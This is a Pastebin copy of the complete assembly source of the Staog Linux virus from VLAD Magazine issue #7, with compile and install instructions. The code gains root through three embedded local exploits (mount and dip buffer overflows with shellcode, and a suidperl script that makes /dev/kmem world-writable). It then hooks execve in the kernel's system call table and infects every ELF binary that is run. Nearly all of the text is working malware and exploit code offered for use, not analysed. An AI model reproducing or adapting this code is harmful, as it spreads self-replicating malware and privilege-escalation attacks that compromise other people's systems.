Advertisement
FlyFar

VLAD Magazine - Issue #7 - ARTICLE.2_4 - STAOG Linux Virus

Jul 2nd, 2023
1,540
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 18.78 KB | Cybersecurity | 0 0
  1. #  +-----------------------------------------------------------------+
  2. #  |                            S T A O G                            |
  3. #  |                                                                 |
  4. #  |          yo ho.. welcome to yet another attempt at the          |
  5. #  |        impossible and improbable.  This virus is a fully        |
  6. #  |       resident linux elf infector.  It will infect files        |
  7. #  |           on execute regardless of who executed them.           |
  8. #  |         It achieves this by hacking root via 3 separate         |
  9. #  |     exploits and installing itself in the kernel.  It leaves    |
  10. #  |        no trace of itself in drop files or other noticable      |
  11. #  |          locations but contains no stealth of any type.         |
  12. #  |                                                                 |
  13. #  |       This is not a script virus.  It is written in 100%        |
  14. #  |       at&t style asm.  To compile:                              |
  15. #  |                                                                 |
  16. #  |                   gcc vircode.s -o vircode                      |
  17. #  |                   strip vircode                                 |
  18. #  |                                                                 |
  19. #  |   The filesize should be 4744 bytes.  If not put the filesize   |
  20. #  |        in the .long at 'filesize:' and recompile and strip.     |
  21. #  |          Then execute to install.  After installation the       |
  22. #  |         generated binary will automatically be deleted.         |
  23. #  |                                                                 |
  24. #  |   For some reason this virus will only work on ELF machines     |
  25. #  |       running the 1.2.13 kernel.                                |
  26. #  |                                                                 |
  27. #  |                    Q U A N T U M  /  V L A D                    |
  28. #  +-----------------------------------------------------------------+
  29.  
  30. .text
  31. .global vircode
  32. vircode:                                  # start of the virus
  33.     pushl $0                          # entry point
  34.     pushl %ebp                        # setup stack frame
  35.     movl %esp,%ebp
  36.     pusha                             # save all regs
  37.     movl $125,%eax                    # make cs writable
  38.     movl $0x8000000,%ebx
  39.     movl $0x4000,%ecx
  40.     movl $7,%edx
  41.     int $0x80
  42.     call recalc                       # dynamic relocation  
  43. recalc:
  44.     pop %edx
  45.     subl $recalc,%edx
  46.     leal vircode(%edx),%eax           # store entrypoint
  47.     movl %eax,4(%ebp)                
  48.  
  49.     movl $11,%eax                     # are we already resident ?
  50.     movl $0x666,%ebx
  51.     int $0x80
  52.     cmp $0x667,%ebx
  53.     jnz goresident
  54.     jmp ret2host
  55. goresident:
  56.     movl 12(%ebp),%ebx                # open argv[0]
  57.     xorl %ecx,%ecx
  58.     movl $5,%eax
  59.     int $0x80
  60.     or %eax,%eax
  61.     js ohfuck
  62.     movl %eax,%ebx
  63.  
  64.     movl $19,%eax                     # seek to vircode
  65.     movl $vircode-main,%ecx          
  66.     subl filesize(%edx),%ecx
  67.     pushl %edx
  68.     movl $2,%edx
  69.     int $0x80
  70.     popl %edx
  71.  
  72.     subl filesize(%edx),%esp          
  73.  
  74.     movl $3,%eax                      # read in vircode
  75.     movl %esp,%ecx
  76.     pushl %edx
  77.     movl filesize(%edx),%edx                  
  78.     int $0x80
  79.     popl %edx
  80.  
  81.     movl $6,%eax                      # close argv
  82.     int $0x80      
  83.  
  84.     movl $5,%eax                      # open tmp name for virus body
  85.     leal virname(%edx),%ebx
  86.     movl $577,%ecx
  87.     pushl %edx
  88.     movl $448,%edx
  89.     int $0x80
  90.     popl %edx
  91.     movl %eax,%ebx
  92.    
  93.     movl $4,%eax                     # write vircode
  94.     movl %esp,%ecx
  95.     pushl %edx
  96.     movl filesize(%edx),%edx                  
  97.     int $0x80
  98.     popl %edx
  99.  
  100.     movl $6,%eax                     # close tmp
  101.     int $0x80
  102.  
  103.     addl filesize(%edx),%esp                  
  104.  
  105.     movl $2,%eax                         # fork
  106.     int $0x80
  107.     orl %eax,%eax
  108.     jne ret2host
  109.  
  110.     movl $36,%eax                        # sync
  111.     int $0x80
  112.  
  113.     leal virname(%edx),%ebx              # exec the virus
  114.     leal virargs(%edx),%ecx
  115.     movl %ebx,(%ecx)
  116.     movl 8(%ebp),%eax
  117.     shll $2,%eax
  118.     leal 16(%ebp),%edx
  119.     addl %eax,%edx
  120.     movl $11,%eax
  121.     int $0x80
  122.     movl $1,%eax
  123.     int $0x80
  124. # return to host
  125. ret2host:
  126.     movl 12(%ebp),%ebx                # open argv[0]
  127.     xorl %ecx,%ecx
  128.     movl $5,%eax
  129.     int $0x80
  130.     or %eax,%eax
  131.     js ohfuck
  132.     movl %eax,%ebx
  133.     movl %esp,%edi                    # allocate space for return frame
  134.     subl $endstackexecode-stackexecode+50,%edi
  135.     leal stackexecode(%edx),%esi      # copy return frame to stack
  136.     movl $endstackexecode-stackexecode,%ecx
  137.     pushl %edi
  138.     rep
  139.     movsb
  140.     movl $19,%eax                     # move to original bytes in argv[0]
  141.     movl $vircode-main,%ecx
  142.     pushl %edx
  143.     movl $2,%edx
  144.     int $0x80
  145.     popl %edx
  146.     movl $3,%eax                      # ready to read in org bytes
  147.     leal vircode(%edx),%ecx
  148.     movl $main-vircode,%edx
  149.     ret                               # goto return frame
  150.  
  151. ohfuck:
  152.     movl $1,%eax
  153.     int $0x80
  154.  
  155. stackexecode:                             # executed on the stack
  156.     int $0x80                         # retreive original bytes
  157.     movl $6,%eax
  158.     int $0x80                         # close file handle
  159.     popa                              # restore all registers
  160.     pop %ebp                          # restore stack
  161.     ret                               # return to host
  162. endstackexecode:
  163.  
  164. filesize:
  165. .long 4744
  166.  
  167. st:
  168. .long 0
  169.  
  170. virname:
  171. .string "/tmp/hookup"
  172.  
  173. virargs:
  174. .long 0
  175. .long 0
  176.  
  177. .string "Staog by Quantum / VLAD"
  178.  
  179. .global main
  180. main:
  181.     movl %esp,%ebp
  182.     movl $11,%eax                     # are we already resident ?
  183.     movl $0x666,%ebx
  184.     int $0x80
  185.     cmp $0x667,%ebx
  186.     jnz goresident1
  187.     jmp tmpend
  188. goresident1:
  189.     movl $125,%eax                    # make cs writable
  190.     movl $0x8000000,%ebx
  191.     movl $0x4000,%ecx
  192.     movl $7,%edx
  193.     int $0x80
  194.     movl $130,%eax                    # get num kernel syms
  195.     movl $0,%ebx
  196.     int $0x80
  197.     shll $6,%eax
  198.     subl %eax,%esp
  199.     movl %esp,%esi
  200.     pushl %eax
  201.     movl %esi,%ebx                    # get kernel syms
  202.     movl $130,%eax
  203.     int $0x80
  204.     pushl %esi      
  205. nextsym1:                                  # find symbol
  206.     movl $thissym1,%edi
  207.     push %esi
  208.     addl $4,%esi
  209.     cmpb $95,(%esi)
  210.     jnz notuscore
  211.     incl %esi
  212. notuscore:
  213.     cmpsl
  214.     cmpsl
  215.     pop %esi
  216.     jz foundsym1
  217.     addl $64,%esi
  218.     jmp nextsym1
  219. foundsym1:
  220.     movl (%esi),%esi
  221.     movl %esi,current
  222.     popl %esi
  223.  
  224.     pushl %esi      
  225. nextsym2:                                  # find symbol
  226.     movl $thissym2,%edi
  227.     push %esi
  228.     addl $4,%esi
  229.     cmpsl
  230.     cmpsl
  231.     pop %esi
  232.     jz foundsym2
  233.     addl $64,%esi
  234.     jmp nextsym2
  235. foundsym2:
  236.     movl (%esi),%esi
  237.     movl %esi,kmalloc
  238.     popl %esi
  239.  
  240.     xorl %ecx,%ecx
  241. nextsym:                                  # find symbol
  242.     movl $thissym,%edi
  243.     movb $15,%cl
  244.     push %esi
  245.     addl $4,%esi
  246.     rep
  247.     cmpsb
  248.     pop %esi
  249.     jz foundsym
  250.     addl $64,%esi
  251.     jmp nextsym
  252. foundsym:
  253.     movl (%esi),%esi
  254.     pop %eax
  255.     addl %eax,%esp
  256.  
  257.     movl %esi,syscalltable
  258.     xorl %edi,%edi
  259.    
  260. opendevkmem:
  261.     movl $devkmem,%ebx           # open /dev/kmem
  262.     movl $2,%ecx
  263.     call openfile
  264.     orl %eax,%eax
  265.     js haxorroot
  266.     movl %eax,%ebx
  267.  
  268.     leal 44(%esi),%ecx                # lseek to sys_call_table[SYS_execve]
  269.     call seekfilestart
  270.    
  271.     movl $orgexecve,%ecx         # read in execve pointer
  272.     movl $4,%edx
  273.     call readfile
  274.  
  275.     leal 488(%esi),%ecx               # seek to sys_call_table[SYS_uname]
  276.     call seekfilestart
  277.  
  278.     movl $taskptr,%ecx           # read in sys_call_table[SYS_uname]
  279.     movl $4,%edx
  280.     call readfile
  281.    
  282.     movl taskptr,%ecx           # seek to uname code
  283.     call seekfilestart
  284.  
  285.     subl $endhookspace-hookspace,%esp
  286.    
  287.     movl %esp,%ecx                    # read in org uname bytes
  288.     movl $endhookspace-hookspace,%edx
  289.     call readfile
  290.    
  291.     movl taskptr,%ecx           # seek to uname code
  292.     call seekfilestart
  293.  
  294.     movl filesize,%eax                # amount to alloc
  295.     addl $virend-vircode,%eax
  296.     movl %eax,virendvircodefilesize
  297.  
  298.     movl $hookspace,%ecx         # write our code
  299.     movl $endhookspace-hookspace,%edx
  300.     call writefile
  301.  
  302.     movl $122,%eax                    # call uname to alloc some space
  303.     int $0x80
  304.     movl %eax,codeto
  305.    
  306.     movl taskptr,%ecx                 # seek to uname code
  307.     call seekfilestart
  308.  
  309.     movl %esp,%ecx                    # write org uname bytes
  310.     movl $endhookspace-hookspace,%edx
  311.     call writefile
  312.    
  313.     addl $endhookspace-hookspace,%esp
  314.  
  315.     subl $aftreturn-vircode,orgexecve      
  316.  
  317.     movl codeto,%ecx                  # seek to buffer
  318.     subl %ecx,orgexecve
  319.     call seekfilestart
  320.  
  321.     movl $vircode,%ecx                # write vircode
  322.     movl $virend-vircode,%edx
  323.     call writefile
  324.  
  325.     subl filesize,%esp                # read in virus      
  326.     pushl %ebx
  327.     movl 8(%ebp),%ebx
  328.     movl (%ebx),%ebx
  329.     xorl %ecx,%ecx
  330.     call openfile
  331.     movl %eax,%ebx
  332.     leal 4(%esp),%ecx
  333.     movl filesize,%edx                      
  334.     call readfile
  335.     call closefile
  336.     popl %ebx
  337.  
  338.     movl %esp,%ecx                    # write virus to end of alloc space
  339.     movl filesize,%edx                      
  340.     call writefile
  341.  
  342.     addl filesize,%esp                      
  343.  
  344.     leal 44(%esi),%ecx                # seek to sys_call_table[SYS_execve]
  345.     call seekfilestart
  346.  
  347.     addl $newexecve-vircode,codeto
  348.  
  349.     movl $codeto,%ecx                 # write pointer to execve handler
  350.     movl $4,%edx
  351.     call writefile
  352.  
  353.     call closefile                    # close file
  354.  
  355. tmpend:
  356.     movl 8(%ebp),%ebx                 # rm argv[0]
  357.     movl (%ebx),%ebx
  358.     call rmfile
  359.     call exit
  360.  
  361. openfile:
  362.     movl $5,%eax
  363.     int $0x80
  364.     ret
  365.  
  366. closefile:
  367.     movl $6,%eax
  368.     int $0x80
  369.     ret
  370.  
  371. readfile:
  372.     movl $3,%eax
  373.     int $0x80
  374.     ret
  375.  
  376. writefile:
  377.     movl $4,%eax
  378.     int $0x80
  379.     ret
  380.  
  381. seekfilestart:
  382.     movl $19,%eax
  383.     xorl %edx,%edx
  384.     int $0x80
  385.     ret
  386.  
  387. rmfile:
  388.     movl $10,%eax
  389.     int $0x80
  390.     ret
  391.  
  392.  
  393. exit:
  394.     xorl %eax,%eax
  395.     incl %eax
  396.     int $0x80
  397.  
  398. waitchild:
  399.     movl $7,%eax
  400.     movl $-1,%ebx
  401.     movl $st,%ecx
  402.     xorl %edx,%edx
  403.     int $0x80
  404.     ret
  405.  
  406.  
  407.  
  408. haxorroot:                                # this routine makes /dev/kmem a+wr
  409.     cmpl $3,%edi
  410.     jz ret2host
  411.     movl $2,%eax                      # fork()
  412.     int $0x80
  413.     orl %eax,%eax                     # are we the child or parent
  414.     jnz parent
  415.     xorl %ebx,%ebx                    # close stdin
  416.     call closefile  
  417.     movl $1,%ebx                      # close stdout
  418.     call closefile  
  419.     movl $2,%ebx                      # close stderr
  420.     call closefile
  421.     cmpl $1,%edi                      # try sploit 1
  422.     jz sploit1
  423.     cmpl $2,%edi                      # try sploit 2
  424.     jz sploit2
  425.     movl $2,%eax                      # try sploit 3
  426.     int $0x80                         # fork
  427.     orl %eax,%eax  
  428.     jne notc1
  429.     movl $2,%eax                      # fork
  430.     int $0x80
  431.     orl %eax,%eax
  432.     jne notc2
  433.     movl $4,r
  434.     jmp allgo
  435. notc2:
  436.     call waitchild                    # wait for child
  437.     movl $8,r
  438.     jmp allgo
  439. notc1:
  440.     call waitchild                    # wait for child
  441.     movl $0,r
  442. allgo:
  443.     subl $1029,%esp                   # allocate space for egg
  444.     mov %esp,%edi
  445.     movl $1028-60,%ecx
  446.     subl r,%ecx
  447.     movb $0x90,%al                    # add nops to egg
  448.     rep
  449.     stosb
  450.     movl $execshell,%esi              # add shell to egg
  451.     movl $60,%ecx
  452.     rep
  453.     movsb
  454.     movl %esp,%eax                    # add return address
  455.     addl $1200,%eax
  456.     stosl
  457.     xorl %eax,%eax
  458.     stosb
  459.     movl $11,%eax                     # execute mount sploit
  460.     movl $mountpath,%ebx
  461.     movl $args,%ecx
  462.     movl %esp,4(%ecx)
  463.     movl $env,%edx
  464.     int $0x80
  465.     call exit
  466.  
  467. execshell:
  468. .string "\xeb\x21\x5b\x31\xc9\x66\xb9\xff\x01\x31\xc0\x88\x43\x09\x88\x43\x14\xb0\x0f\xcd\x80\x31\xc0\xb0\x0a\x8d\x5b\x0a\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xda\xff\xff\xff/dev/kmemx/etc/mtab~"
  469. mountpath:
  470. .string "/sbin/mount"
  471. r:
  472. .long 0
  473. args:
  474. .long mountpath
  475. .long 0
  476. .long 0
  477. env:
  478. .long 0
  479.  
  480. dipname:
  481. .string "/tmp/t.dip"
  482. execthis:
  483. .string "/bin/sh"
  484. parm1:
  485. .string "-c"
  486. pathdip:
  487. .string "/sbin/dip /tmp/t.dip"
  488. args1:
  489. .long execthis
  490. .long parm1
  491. .long pathdip
  492. .long 0
  493. chkey:
  494. .string "chatkey "
  495. hsname:
  496. .string "/tmp/hs"
  497. hsdat:
  498. .string "#!/bin/sh\nchmod 666 /dev/kmem\n"
  499. shell:
  500. .string "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hs"
  501. sploit1:
  502.     subl $1024,%esp                  # allocate space for egg
  503.     movl %esp,%edi
  504.     movl $chkey,%esi                 # add "chatkey " to egg
  505.     movsl
  506.     movsl
  507.     movl %esp,%eax
  508.     subl $224,%eax                   # add return address to egg
  509.     movl $34,%ecx
  510.     rep
  511.     stosl
  512.     movl $512-144,%ecx               # add nops to egg
  513.     movb $0x90,%al
  514.     rep
  515.     stosb
  516.     movl $shell,%esi                 # add shell to egg
  517.     movl $50,%ecx
  518.     rep
  519.     movsb
  520.     movl $10,%al                     # add \n to egg
  521.     stosb
  522.     movl $dipname,%ebx               # create dip script
  523.     movl $577,%ecx
  524.     movl $448,%edx
  525.     call openfile
  526.     movl %eax,%ebx
  527.     movl %esp,%ecx
  528.     pushl %edx
  529.     movl $562,%edx                   # write script code
  530.     call writefile
  531.     popl %edx
  532.     call closefile        
  533.     movl $hsname,%ebx                # create shell file to execute
  534.     movl $577,%ecx
  535.     movl $448,%edx
  536.     call openfile
  537.     movl %eax,%ebx
  538.     movl $hsdat,%ecx
  539.     movl $30,%edx
  540.     call writefile                   # write shell contents
  541.     call closefile        
  542.     movl $2,%eax                     # fork
  543.     int $0x80
  544.     orl %eax,%eax
  545.     jne p1
  546.     movl $execthis,%ebx              # execute sploit
  547.     movl $args1,%ecx
  548.     movl 12(%ebp),%edx
  549.     movl $11,%eax
  550.     int $0x80
  551.     call exit        
  552. p1:     call waitchild                   # wait for sploit to finish
  553.     movl $dipname,%ebx               # remove dip script
  554.     call rmfile
  555.     movl $hsname,%ebx                # remove shell script
  556.     call rmfile
  557.     call exit
  558.  
  559. perlname:
  560. .string "/tmp/b"
  561.  
  562. perldat:
  563. .string "#!/usr/bin/suidperl -U\n$ENV{PATH}=\"/bin:/usr/bin\";\n$>=0;$<=0;\nexec(\"chmod 666 /dev/kmem\");\n"
  564.  
  565. perlargs:
  566. .long perlname
  567. perlenv:
  568. .long 0
  569.  
  570. sploit2:
  571.     movl $perlname,%ebx                  # create perl script
  572.     movl $577,%ecx
  573.     movl $488,%edx
  574.     call openfile
  575.     movl %eax,%ebx
  576.     movl $perldat,%ecx                   # write perl contents
  577.     movl $91,%edx
  578.     call writefile
  579.     movl $94,%eax
  580.     movl $2496,%ecx
  581.     int $0x80
  582.     call closefile        
  583.     movl $2,%eax                         # fork
  584.     int $0x80
  585.     orl %eax,%eax
  586.     jne p2
  587.     movl $11,%eax                        # execute the sploit
  588.     movl $perlname,%ebx
  589.     movl $perlargs,%ecx
  590.     movl $perlenv,%edx
  591.     int $0x80
  592.     call exit      
  593. p2:
  594.     call waitchild                       # wait for the child
  595.     movl $perlname,%ebx                  # remove perl script
  596.     call rmfile
  597.     call exit      
  598.  
  599. parent:
  600.     incl %edi
  601.     call waitchild  # wait for child process to finish
  602.     jmp opendevkmem
  603.  
  604. taskptr:
  605. .long 0
  606.  
  607. otaskptr:
  608. .long 0
  609.  
  610. codeto:
  611. .long 0
  612.  
  613. thissym:
  614. .string "sys_call_table"
  615.  
  616. thissym1:
  617. .string "current"
  618.  
  619. thissym2:
  620. .string "kmalloc"
  621.  
  622. devkmem:
  623. .string "/dev/kmem"
  624.  
  625. e_entry:
  626. .long 0x666
  627.  
  628. infect:                                   # opens and infects the file in %ebx
  629.     pushl $2                          # open %ebx
  630.     pushl %ebx
  631.     call 5*4(%ebp)
  632.     popl %ebx
  633.     popl %ebx
  634.     orl %eax,%eax                     # make sure it's opened
  635.     js e1
  636.     movl %eax,%ebx
  637.     push %fs
  638.     push %ds
  639.     pop %fs
  640.     leal e_entry(%edi),%ecx                 # read in elf hdr marker
  641.     movl $4,%edx
  642.     pushl %edx
  643.     pushl %ecx
  644.     pushl %ebx
  645.     call 3*4(%ebp)  
  646.     addl $12,%esp
  647.     cmpl $0x464c457f,e_entry(%edi)          # make sure it's elf
  648.     jnz e2
  649.     pushl $0                                # seek to entrypoint storage
  650.     pushl $24
  651.     pushl %ebx
  652.     call 19*4(%ebp)
  653.     addl $12,%esp
  654.     leal e_entry(%edi),%ecx                 # read the entrypoint
  655.     pushl $4
  656.     pushl %ecx
  657.     pushl %ebx
  658.     call 3*4(%ebp)
  659.     addl $12,%esp
  660.     andl $0xffff,e_entry(%edi)
  661.     movl e_entry(%edi),%ecx               # seek to entrypoint
  662.     pushl $0
  663.     pushl %ecx
  664.     pushl %ebx
  665.     call 19*4(%ebp)
  666.     popl %eax
  667.     popl %eax
  668.     popl %eax
  669.     subl $main-vircode,%esp               # allocate space on the stack
  670.     movl %esp,%esi
  671.     pushl $main-vircode                     # read in host bytes
  672.     pushl %esi
  673.     pushl %ebx
  674.     call 3*4(%ebp)
  675.     addl $12,%esp
  676.     movl vircode(%edi),%eax
  677.     cmpl %eax,(%esi)                        # check if file infected
  678.     jz e3
  679.  
  680.     pushl $2                                # seek to end of file
  681.     pushl $0
  682.     pushl %ebx
  683.     call 19*4(%ebp)
  684.     addl $12,%esp
  685.     movl filesize(%edi),%eax
  686.     pushl %eax                              
  687.     leal virend(%edi),%eax                  # write virus body to end
  688.     pushl %eax
  689.     pushl %ebx
  690.     call 4*4(%ebp)
  691.     addl $12,%esp
  692.     pushl $2                                # seek to end of file
  693.     pushl $0
  694.     pushl %ebx
  695.     call 19*4(%ebp)
  696.     addl $12,%esp
  697.     pushl $main-vircode                   # write org bytes
  698.     pushl %esi
  699.     pushl %ebx
  700.     call 4*4(%ebp)  
  701.     addl $12,%esp
  702.     movl e_entry(%edi),%ecx                 # seek to entrypoint
  703.     pushl $0
  704.     pushl %ecx
  705.     pushl %ebx
  706.     call 19*4(%ebp)
  707.     addl $12,%esp
  708.     leal vircode(%edi),%ecx                 # write virus
  709.     pushl $main-vircode
  710.     pushl %ecx
  711.     pushl %ebx
  712.     call 4*4(%ebp)
  713.     addl $12,%esp
  714. e3:
  715.     addl $main-vircode,%esp               # deallocate space off stack
  716. e2:
  717.     pop %fs
  718.     pushl %ebx
  719.     call 6*4(%ebp)                          # close file
  720.     popl %eax
  721.     call 36*4(%ebp)                         # sync
  722. e1:
  723.     ret
  724.  
  725. uidsave:
  726. .word 0
  727. euidsave:
  728. .word 0
  729. suidsave:
  730. .word 0
  731. fsuidsave:
  732. .word 0
  733.  
  734. gidsave:
  735. .word 0
  736. egidsave:
  737. .word 0
  738. sgidsave:
  739. .word 0
  740. fsgidsave:
  741. .word 0
  742.  
  743. saveuids:
  744.     movl current(%edi),%eax
  745.     movl (%eax),%eax
  746.     leal 0x310(%eax),%esi
  747.     pushl %edi
  748.     leal uidsave(%edi),%edi
  749.     movl $4,%ecx
  750.     rep
  751.     movsl
  752.     popl %edi
  753.     ret
  754.  
  755. makeroot:
  756.     movl current(%edi),%eax
  757.     movl (%eax),%eax
  758.     pushl %edi
  759.     leal 0x310(%eax),%edi
  760.     xorl %eax,%eax
  761.     movl $4,%ecx
  762.     rep
  763.     stosl
  764.     popl %edi
  765.     ret
  766.  
  767. loaduids:
  768.     movl current(%edi),%eax
  769.     movl (%eax),%eax
  770.     leal uidsave(%edi),%esi
  771.     pushl %edi
  772.     leal 0x310(%eax),%edi
  773.     movl $4,%ecx
  774.     rep
  775.     movsl
  776.     popl %edi
  777.     ret
  778.  
  779. .global newexecve
  780. newexecve:
  781.     pushl %ebp
  782.     movl %esp,%ebp
  783.     pushl %ebx
  784.     movl 8(%ebp),%ebx                   # get the filename to infect
  785.     pushal
  786.     cmpl $0x666,%ebx                    # is this our service routine ?
  787.     jnz notserv
  788.     popal
  789.     incl 8(%ebp)                        # yes..inc the pointer and return
  790.     popl %ebx
  791.     popl %ebp
  792.     ret
  793. notserv:
  794.     call ring0recalc                    # no.. calculate ring 0 delta
  795. ring0recalc:
  796.     popl %edi
  797.     subl $ring0recalc,%edi
  798.     movl syscalltable(%edi),%ebp        # put *sys_call_table in %ebp
  799.     call saveuids                       # save the callers uid/euid...
  800.     call makeroot                       # make the caller root
  801.     call infect                         # infect the file
  802.     call loaduids                       # restore the callers uid/euid...
  803. hookoff:
  804.     popal
  805.     popl %ebx
  806.     popl %ebp
  807. .byte   0xe9                                # goto original execve
  808. orgexecve:
  809. .long   0
  810. aftreturn:
  811.  
  812. syscalltable:
  813. .long 0
  814.  
  815. current:
  816. .long 0
  817.  
  818. .global hookspace
  819. hookspace:
  820.     push %ebp
  821.     pushl %ebx
  822.     pushl %ecx
  823.     pushl %edx
  824.     movl %esp,%ebp
  825.  
  826.     pushl $3
  827. .byte   0x68
  828. virendvircodefilesize:
  829. .long   0
  830. .byte   0xb8               # movl $xxx,%eax    
  831. kmalloc:
  832. .long   0
  833.     call %eax
  834.  
  835.     movl %ebp,%esp
  836.     popl %edx
  837.     popl %ecx
  838.     popl %ebx
  839.     popl %ebp      
  840.     ret    
  841.  
  842. .global endhookspace
  843. endhookspace:
  844. .global virend
  845. virend:
  846.  
Tags: Linux virus vlad
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement